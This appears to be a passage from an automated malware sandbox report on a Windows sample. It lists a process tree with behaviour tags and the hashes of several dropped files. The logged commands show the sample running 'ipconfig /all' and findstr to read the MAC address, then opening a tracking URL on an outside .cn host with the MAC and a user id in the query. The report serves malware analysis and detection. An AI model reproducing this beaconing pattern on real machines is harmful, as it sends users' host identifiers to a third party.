C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1324 CREDAT:17414 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1212
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1324 CREDAT:17418 /prefetch:23⤵
- Modifies Internet Explorer settings
PID:4044
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.fx0099.cn/tj/tj.asp?mac= CA:15:2A:8D:AB:80&ver=990426&userid=341⤵
- Modifies Internet Explorer settings
PID:1104
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"Physical Address"1⤵PID:4568
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all1⤵
- Gathers network information
PID:4140
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3100
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
222B
MD57ecf8b9c507fb8900b8b80de2526b326
SHA170eb6d6e4a9400f0641d7bcf9af1efc48538ab71
SHA256259e0dbb56eb1db0b606d0a08c28c36f2e542b7c15ed4f7d01f9bc9d4ffaf46f
SHA5122bc05755a66ce6465e209af054e34053cc8c2fb9c79364a77ada342b339ab267491a27b225ba5fffdcf7dfb5e136f6d0821ed7dd63b84bead1814d3f492af7bf
-
Filesize
1KB
MD5efc62c2835560b596ec55d430ef6b6be
SHA14c4dfbf3781d97d1703d6f230fd5d264c5abdbd9
SHA25633c17f0fffc2a14fab93e5ba3b2789506de8e9bac3b07f0ef6daeaca41b3043e
SHA51204f42e962745ef0d71c039e18039d6d11e2a5f1aab21bc7312f11bc0020dde28146a63692bdf9695a097fcea58262004e6ff61040749bac111889653b48f00b9
-
Filesize
2KB
MD547e2902e2b92f442e23446735294778f
SHA1983abc535f25689c716dc5969c8786f84bc18560
SHA2565ac48ac606ef23eb0ddc99b60af1245d6578805374d9a7e2367a75efcb56630a
SHA5129e28efb398c581b996790408376e6471c7a2de50b119a55300b9baace29b67ce8d558b7b9f1aec8535103a6cb4c92258b57898f42d8b852981386e9ffec81e46
-
Filesize
132B
MD57962c7037a1671630f3006e3fbe2e909
SHA17808c7f7d9c18854521728d1efce405f1c527d3c
SHA256dd22a6095d32a6c0812f51532ba8fbe5d90910c0d0276c169a48c201440e5d93
SHA51253abb4a38e7cec72012d7f30feabb571ba57c45f1ec8ac0570e12b29af3b20ef0f6082ca08608850a81de090236974db2ab874ea69e95d32c5140501c22bb028
-
Filesize
7KB
MD5dfc298564145bc64726a25a894859180
SHA14db1929ada987e9c898b264f2521f26d346f6b03
SHA2562cd26f4be78e4ed251494f870cdee82a020e4512505e8a21634c9db435801942
SHA5121a2a07a6373c39e08f4b3d25f846e98babe6a0f461ad97534f3e7cf48e54609159c533f97bc3e3dc7f020b8301b6040088ea7d711d6523e729d63eb451500bf2
-
Filesize
3KB
MD52de79c40992d47951cefa20f54d67b64
SHA17f27c2c3b69a3688fc0c8a84aefb2f4ad0c3e6f0
SHA2567f09cdfa905b7810eea79099d1930011fa058511fec4ee0edfa946b86aec6dbf
SHA512f296e76a379cb3f67aae72c59fab544b608d3cae1c7f66a57256cc2e70c94d4364f3c1e7682d26cc815fd7a1b1c717250111eba1a716dcb2ad73862b7e0e918a
-
Filesize
66B
MD5ba006d636a4d59398063297485db48cc
SHA16f55152671b5cfcc6918f58063be556544e3df62
SHA2569035eddc448f3da18990c79b1f4b60a2953391df31e43ab8195271d48bd4d14f
SHA5124f3dcbfe269832d370d3b8749006eedba30986cf028217a0a8b6e5c2e1d29123800ae8b2e9614a5ea675634e04a61a4c506b4aa5f061ea2b2036b7ef0ab9073a